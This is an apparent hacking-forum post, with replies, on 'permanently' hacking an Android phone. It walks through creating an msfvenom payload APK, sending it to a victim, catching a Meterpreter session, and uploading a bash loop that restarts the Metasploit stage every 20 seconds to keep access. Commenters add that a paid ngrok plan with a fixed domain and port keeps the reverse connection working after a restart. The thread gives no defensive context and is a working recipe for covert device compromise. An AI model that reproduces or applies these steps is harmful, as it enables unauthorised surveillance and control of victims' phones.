Hack Android Device Permanently

Greetings everyone, In today’s tutorial I am going to show you how to hack android device permanently.
The first basic thing is to create a payload as always you do.

  1. Create a payload (msfvenom)
  2. send it to victim
  3. run metasploit
  4. set up lhost and lport
  5. exploit it
  6. then install and open the apk in the targeted phone. You will get the meterpreter session.

After the meterpreter session just upload the following.


#!/bin/bash
while :
do am start --user 0 -a android.internet.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done


Hope you know to save it with .sh extension.
And take the shell and run it. That’s it you’re done.

Need Help? or didn’t get well? Here is the video = https://www.youtube.com/watch?v=vjaLUmJ8Ve4&feature=youtu.be

3 Likes

I think If we restart the pc means you then we will lost our reverse connection through ngrok. Then how to exploit it permanently?

3 Likes

I think if you buy premium version of NGROK it will give you a fixed domain and port,So even if you restart your PC you will get the same domain and port.

Thanks for sharing I will try and inform u

1 Like